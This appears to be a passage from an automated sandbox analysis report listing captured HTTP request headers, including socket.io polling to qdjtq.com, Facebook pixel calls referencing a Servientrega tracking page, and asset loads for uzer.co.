Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.servientrega.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=EAVYAwv8c3Wq9ksAAHuA HTTP/1.1Host: qdjtq.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://qdjtq.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: jMFa4kXC62YZxnoFaLK5fw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mujkk HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muk5i&sid=EAVYAwv8c3Wq9ksAAHuA HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=303367017008635&ev=PageView&dl=https%3A%2F%2Fwww.servientrega.com%2Fwps%2Fportal%2Frastreo-envio%2F!ut%2Fp%2Fz1%2F04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziTS08TTwMTAz93f1cTAwCg5yMfP0MHT2NPQ30w8EKDHAARwP9KGL041EQhd_4cP0oPFYYOfoaQRXgMaMgNzTCINNREQC2ok6g%2F&rl=&if=false&ts=1727397027548&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&cs_est=true&ler=empty&cdl=API_unavailable&it=1727397021933&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.servientrega.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=303367017008635&ev=PageView&dl=https%3A%2F%2Fwww.servientrega.com%2Fwps%2Fportal%2Frastreo-envio%2F!ut%2Fp%2Fz1%2F04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziTS08TTwMTAz93f1cTAwCg5yMfP0MHT2NPQ30w8EKDHAARwP9KGL041EQhd_4cP0oPFYYOfoaQRXgMaMgNzTCINNREQC2ok6g%2F&rl=&if=false&ts=1727397027548&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&cs_est=true&ler=empty&cdl=API_unavailable&it=1727397021933&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source=navigation-source, triggerReferer: https://www.servientrega.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=999069541179688&ev=PageView&dl=https%3A%2F%2Fwww.servientrega.com%2Fwps%2Fportal%2Frastreo-envio%2F!ut%2Fp%2Fz1%2F04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziTS08TTwMTAz93f1cTAwCg5yMfP0MHT2NPQ30w8EKDHAARwP9KGL041EQhd_4cP0oPFYYOfoaQRXgMaMgNzTCINNREQC2ok6g%2F&rl=&if=false&ts=1727397030227&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&ler=empty&cdl=API_unavailable&it=1727397021933&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.servientrega.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=999069541179688&ev=PageView&dl=https%3A%2F%2Fwww.servientrega.com%2Fwps%2Fportal%2Frastreo-envio%2F!ut%2Fp%2Fz1%2F04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziTS08TTwMTAz93f1cTAwCg5yMfP0MHT2NPQ30w8EKDHAARwP9KGL041EQhd_4cP0oPFYYOfoaQRXgMaMgNzTCINNREQC2ok6g%2F&rl=&if=false&ts=1727397030227&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&ler=empty&cdl=API_unavailable&it=1727397021933&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger, event-sourceReferer: https://www.servientrega.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=303367017008635&ev=PageView&dl=https%3A%2F%2Fwww.servientrega.com%2Fwps%2Fportal%2Frastreo-envio%2F!ut%2Fp%2Fz1%2F04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziTS08TTwMTAz93f1cTAwCg5yMfP0MHT2NPQ30w8EKDHAARwP9KGL041EQhd_4cP0oPFYYOfoaQRXgMaMgNzTCINNREQC2ok6g%2F&rl=&if=false&ts=1727397027548&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&cs_est=true&ler=empty&cdl=API_unavailable&it=1727397021933&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/999069541179688?v=2.9.168&r=stable&domain=www.servientrega.com&hme=3ba426d944c98eb3ce406a0f93fc097d0320a486b65b445a33b2eda3a5aa3429&ex_m=70%2C119%2C105%2C109%2C61%2C4%2C98%2C69%2C16%2C95%2C87%2C51%2C54%2C170%2C173%2C185%2C181%2C182%2C184%2C29%2C99%2C53%2C76%2C183%2C165%2C168%2C178%2C179%2C186%2C129%2C41%2C34%2C141%2C15%2C50%2C192%2C191%2C131%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C91%2C17%2C14%2C94%2C90%2C89%2C106%2C52%2C108%2C39%2C107%2C30%2C92%2C26%2C166%2C169%2C138%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C74%2C100%2C27%2C75%2C9%2C8%2C79%2C48%2C21%2C102%2C101%2C103%2C96%2C10%2C20%2C3%2C38%2C19%2C84%2C56%2C82%2C33%2C73%2C0%2C93%2C32%2C81%2C86%2C47%2C46%2C85%2C37%2C5%2C88%2C80%2C44%2C35%2C83%2C2%2C36%2C63%2C42%2C104%2C45%2C78%2C68%2C110%2C60%2C59%2C31%2C97%2C58%2C55%2C49%2C77%2C72%2C24%2C111%2C198%2C197%2C199%2C204%2C205%2C206%2C202%2C194%2C130%2C132%2C161%2C193%2C195%2C120%2C155%2C143%2C149%2C187%2C188%2C127%2C230%2C114%2C124%2C125%2C231%2C163%2C117%2C233%2C164%2C134%2C121%2C152%2C146%2C112 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mukbh&sid=EAVYAwv8c3Wq9ksAAHuA HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muk5h&sid=EAVYAwv8c3Wq9ksAAHuA HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muk5i&sid=EAVYAwv8c3Wq9ksAAHuA HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=303367017008635&ev=PageView&dl=https%3A%2F%2Fwww.servientrega.com%2Fwps%2Fportal%2Frastreo-envio%2F!ut%2Fp%2Fz1%2F04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziTS08TTwMTAz93f1cTAwCg5yMfP0MHT2NPQ30w8EKDHAARwP9KGL041EQhd_4cP0oPFYYOfoaQRXgMaMgNzTCINNREQC2ok6g%2F&rl=&if=false&ts=1727397027548&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&cs_est=true&ler=empty&cdl=API_unavailable&it=1727397021933&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=999069541179688&ev=PageView&dl=https%3A%2F%2Fwww.servientrega.com%2Fwps%2Fportal%2Frastreo-envio%2F!ut%2Fp%2Fz1%2F04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziTS08TTwMTAz93f1cTAwCg5yMfP0MHT2NPQ30w8EKDHAARwP9KGL041EQhd_4cP0oPFYYOfoaQRXgMaMgNzTCINNREQC2ok6g%2F&rl=&if=false&ts=1727397030227&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&ler=empty&cdl=API_unavailable&it=1727397021933&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=999069541179688&ev=PageView&dl=https%3A%2F%2Fwww.servientrega.com%2Fwps%2Fportal%2Frastreo-envio%2F!ut%2Fp%2Fz1%2F04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziTS08TTwMTAz93f1cTAwCg5yMfP0MHT2NPQ30w8EKDHAARwP9KGL041EQhd_4cP0oPFYYOfoaQRXgMaMgNzTCINNREQC2ok6g%2F&rl=&if=false&ts=1727397030227&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&ler=empty&cdl=API_unavailable&it=1727397021933&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mukbh&sid=EAVYAwv8c3Wq9ksAAHuA HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mulAO HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mulAO HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mulcg&sid=UFk3GnhaSs1mLKgMAHuD HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=UFk3GnhaSs1mLKgMAHuD HTTP/1.1Host: qdjtq.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://qdjtq.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 6ErFNcduvr+7pzwGUD1HMA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mulz2&sid=UFk3GnhaSs1mLKgMAHuD HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mulcZ&sid=UFk3GnhaSs1mLKgMAHuD HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mulcg&sid=UFk3GnhaSs1mLKgMAHuD HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mulz2&sid=UFk3GnhaSs1mLKgMAHuD HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mume7 HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /css/expandable.css HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mum-M&sid=jnmURHTecJrkHRFxAHuG HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mume7 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=jnmURHTecJrkHRFxAHuG HTTP/1.1Host: qdjtq.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://qdjtq.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: f/rjRfzlKfzvPxD+NWYn8Q==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /css/cookiealert.css HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /css/style.css HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /OwlCarousel2/assets/owlcarousel/assets/owl.carousel.min.css HTTP/1.1Host: owlcarousel2.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /OwlCarousel2/assets/owlcarousel/owl.carousel.js HTTP/1.1Host: owlcarousel2.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/normalize/5.0.0/normalize.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/animate.css/3.5.2/animate.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
